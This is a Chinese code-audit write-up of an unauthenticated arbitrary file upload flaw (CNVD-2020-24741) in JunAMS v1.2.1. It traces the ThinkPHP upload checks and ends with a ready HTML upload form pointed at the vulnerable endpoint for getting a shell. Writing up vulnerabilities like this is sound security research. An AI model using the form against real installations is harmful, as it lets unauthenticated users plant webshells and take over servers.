前言

CNVD-2020-24741

过程

JunAMS是以ThinkPHP为框架的开源内容管理系统,本地搭建受影响版本JunAMS v1.2.1.20190403

前台没有上传功能,进入后台。发现在系统设置->版本管理->添加表单中,发现文件上传功能

先传张正常的图片,抓个包看一下:

上传功能没问题,根据POST路径追踪对应功能代码,在common方法中的add_images函数,代码如下:

public function add_images() {

        $file = request()->file('file');

        $path = ROOT_PATH . 'public' . DS . 'edit' . DS;

        if($file){

            $info = $file->validate([])->move($path);

            if($info){

                $name = $info->getSaveName();

                $path = $path.$name;

                # 是否需要压缩

                if (\qiniu\Qiniu::get_zip() == 1) {

                    \qiniu\Qiniu::image_png_size_add($path, $path);

                }

                # 关闭七牛云上传

                if (\qiniu\Qiniu::get_status() == 0) {

                    $url = str_replace(['\\', '//'],'/', dirname($_SERVER['SCRIPT_NAME']) .DS. 'public' .DS. 'edit' .DS. $name);

                } else {

                    # 要先释放TP5的实例,否则无法删除图片

                    unset($info);

                    $url  = \qiniu\Qiniu::put($path, $name);

                }

                # 成功上传后 获取上传信息

                if ($url) {

                    echo json_encode([

                        'code' => 0,

                        'msg'  => '上传成功',

                        'data' => [

                            'src' => $url

                        ],

                    ], JSON_UNESCAPED_UNICODE);exit;

                }

            }

            # 上传失败获取错误信息

            echo json_encode([

                'code' => '01',

                'msg'  => '上传失败:'.$file->getError(),

                'data' => '',

            ], JSON_UNESCAPED_UNICODE);exit;

        }

    }

$info获取文件详情,并经过move函数处理,追踪下move()

public function move($path, $savename = true, $replace = true)

    {

        // 文件上传失败,捕获错误代码

        if (!empty($this->info['error'])) {

            $this->error($this->info['error']);

            return false;

        }

        // 检测合法性

        if (!$this->isValid()) {

            $this->error = 'upload illegal files';

            return false;

        }

        // 验证上传

        if (!$this->check()) {

            return false;

        }

        $path = rtrim($path, DS) . DS;

        // 文件保存命名规则

        $saveName = $this->buildSaveName($savename);

        $filename = $path . $saveName;

        // 检测目录

        if (false === $this->checkPath(dirname($filename))) {

            return false;

        }

        // 不覆盖同名文件

        if (!$replace && is_file($filename)) {

            $this->error = ['has the same filename: {:filename}', ['filename' => $filename]];

            return false;

        }

        /* 移动文件 */

        if ($this->isTest) {

            rename($this->filename, $filename);

        } elseif (!move_uploaded_file($this->filename, $filename)) {

            $this->error = 'upload write error';

            return false;

        }

        // 返回 File 对象实例

        $file = new self($filename);

        $file->setSaveName($saveName)->setUploadInfo($this->info);

        return $file;

    }

这里我们需要着重关注验证上传部分,看下check函数如何定义

public function check($rule = [])

    {

        $rule = $rule ?: $this->validate;

        /* 检查文件大小 */

        if (isset($rule['size']) && !$this->checkSize($rule['size'])) {

            $this->error = 'filesize not match';

            return false;

        }

        /* 检查文件 Mime 类型 */

        if (isset($rule['type']) && !$this->checkMime($rule['type'])) {

            $this->error = 'mimetype to upload is not allowed';

            return false;

        }

        /* 检查文件后缀 */

        if (isset($rule['ext']) && !$this->checkExt($rule['ext'])) {

            $this->error = 'extensions to upload is not allowed';

            return false;

        }

        /* 检查图像文件 */

        if (!$this->checkImg()) {

            $this->error = 'illegal image files';

            return false;

        }

        return true;

    }

check函数中检查了文件类型、后缀图像文件,依次看下代码,首先来看checkMime()

public function checkMime($mime)

    {

        $mime = is_string($mime) ? explode(',', $mime) : $mime;

        return in_array(strtolower($this->getMime()), $mime);

    }

直接将传入的类型与获取到的类型做对比,未做过滤,继续看checkExt()

public function checkExt($ext)

    {

        if (is_string($ext)) {

            $ext = explode(',', $ext);

        }

        $extension = strtolower(pathinfo($this->getInfo('name'), PATHINFO_EXTENSION));

        return in_array($extension, $ext);

    }

后缀类型也没有限制,看下checkImg()

public function checkImg()

    {

        $extension = strtolower(pathinfo($this->getInfo('name'), PATHINFO_EXTENSION));

        // 如果上传的不是图片,或者是图片而且后缀确实符合图片类型则返回 true

        return !in_array($extension, ['gif', 'jpg', 'jpeg', 'bmp', 'png', 'swf']) || in_array($this->getImageType($this->filename), [1, 2, 3, 4, 6, 13]);

    }

    /**

     * 判断图像类型

     * @access protected

     * @param  string $image 图片名称

     * @return bool|int

     */

    protected function getImageType($image)

    {

        if (function_exists('exif_imagetype')) {

            return exif_imagetype($image);

        }

        try {

            $info = getimagesize($image);

            return $info ? $info[2] : false;

        } catch (\Exception $e) {

            return false;

        }

    }

这里限制了当上传的后缀为'gif', 'jpg', 'jpeg', 'bmp', 'png', 'swf'时,文件内容必须为图片,换言之,当不是图片后缀时,内容没有限制

整个上传流程为:获取图片文件后缀、Mime类型、内容,当后缀为图片文件时,检测内容是否为图片,当后缀不为图片文件时,定义上传目录与文件名,上传成功,返回文件路径。并且common方法没有受后台权限验证基类Backend限制,任意用户可访问,产生前台任意文件上传漏洞。

利用

本地构造上传表单

<form enctype="multipart/form-data" action="http://localhost//admin.php/common/add_images.html" method="post">

<input type="file" name="file" size="50"><br>

<input type="submit" value="Upload">

</form>

任意文件上传GETSHELL:



最后

上传文件位置不止一处,其他的还需一一验证。

JunAMS v1.2.1.20190403代码审计笔记的更多相关文章

  1. SeacmsV10.7版代码审计笔记

    data: 2020.11.9 10:00AM description: seacms代码审计笔记 0X01前言 seacms(海洋cms)在10.1版本后台存在多处漏洞,事实上当前最新版V10.7这 ...

  2. PHP代码审计笔记--弱类型存在的安全问题

    0x01 前言 PHP 是一门弱类型语言,不必向 PHP 声明该变量的数据类型,PHP 会根据变量的值,自动把变量转换为正确的数据类型. 弱类型比较,是一个比较蛋疼的问题,如左侧为字符串,右侧为一个整 ...

  3. PHP代码审计笔记--变量覆盖漏洞

    变量覆盖指的是用我们自定义的参数值替换程序原有的变量值,一般变量覆盖漏洞需要结合程序的其它功能来实现完整的攻击. 经常导致变量覆盖漏洞场景有:$$,extract()函数,parse_str()函数, ...

  4. PHP代码审计笔记--代码执行漏洞

    漏洞形成原因:客户端提交的参数,未经任何过滤,传入可以执行代码的函数,造成代码执行漏洞. 常见代码注射函数: 如:eval.preg_replace+/e.assert.call_user_func. ...

  5. PHP代码审计笔记--任意文件下载漏洞

    在文件下载操作中,文件名及路径由客户端传入的参数控制,并且未进行有效的过滤,导致用户可恶意下载任意文件.  0x01 客户端下载 常见于系统中存在文件(附件/文档等资源)下载的地方. 漏洞示例代码: ...

  6. PHP代码审计笔记--命令执行漏洞

    命令执行漏洞,用户通过浏览器在远程服务器上执行任意系统命令,严格意义上,与代码执行漏洞还是有一定的区别. 0x01漏洞实例 例1: <?php $target=$_REQUEST['ip']; ...

  7. PHP代码审计笔记--URL跳转漏洞

    0x01 url任意跳转 未做任何限制,传入任何网址即可进行跳转. 漏洞示例代码: <?php $redirect_url = $_GET['url']; header("Locati ...

  8. PHP代码审计笔记--文件包含漏洞

    有限制的本地文件包含: <?php include($_GET['file'].".php"); ?> %00截断: ?file=C://Windows//win.in ...

  9. PHP代码审计笔记--任意文件上传

     0x01 最简单的文件上传 未进行文件类型和格式做合法性校验,任意文件上传 漏洞代码示例: 新建一个提供上传文件的 upload.html <html> <body> < ...

随机推荐

  1. 计算机网络体系结构整理-第二单元IP技术

    IP技术 1.IPV4 Ipv4的报头格式 Ipv4地址分为ABCDE类, 类别 IP地址范围 私有IP地址范围 A 0.0.0.0-127.255.255.255 10.0.0.0-10.255.2 ...

  2. python pyinsane应用

    import sys from PIL import Image try: import src.abstract as pyinsane except ImportError: import pyi ...

  3. c语言:scanf(" %c",&bla); scanf("%c",&bla); 语句差别

    %前有空格,%没有空格 scanf("%c",&c) 与 scanf(" %c",&c),后者只是在%前多了个空格,似乎没有什么区别,但使用起来 ...

  4. python 读取 写入txt文件

    filename = 'pi_digits.txt' with open(filename) as f:#默认以只读方式打开文件 lines = f.readlines()#读取所有行,结果为列表,每 ...

  5. [刘阳Java]_了解BeanFactory_第4讲

    为什么说我们这篇文章只是说了解一下BeanFactory.因为BeanFactory内在的机制与代码实现实在是太强大了,在这一点我确实不敢滥竽充数. 1. 那么我们又如何去了解BeanFactory, ...

  6. Mycat读写分离的简单实现

    目录 1.Mycat读写分离的配置 1.1.Mycat是什么 1.2.Mycat能干什么 1.2.1.数据库的读写分离 1.2.1.1.数据库读写分离图解 1.2.2.数据库分库分表 1.2.2.1. ...

  7. bash的快捷键

    ctrl + u取消 当前光标之前的输入 ctrl + k 取消 当前光标之后的输入 ctrl + a 移动 当前光标到行首 ctrl + e 移动  当前光标到行尾

  8. P2014选课

    洛谷P2014选课 一道树形DP题. f[i][j]表示i个点选j门课程的最大学分. 递推方程: for(int a=n;a>0;a--)//总共选择多少 for(int b=0;b<a; ...

  9. POJ1723,1050,HDU4864题解(贪心)

    POJ1723 Soldiers 思维题. 考虑y坐标,简单的货舱选址问题,选择中位数即可. 再考虑x坐标,由于直接研究布置方法非常困难,可以倒着想:不管如何移动,最后的坐标总是相邻的,且根据贪心的思 ...

  10. 1.2MATLAB数值数据

    1.2MATLAB数值数据 数值数据类型的分类 整型 浮点型 复数型 1. 整型 无符号整数(uint) 无符号8位整数 0000 0000 - 1111 1111 (0 ~ 28-1[256]) 无 ...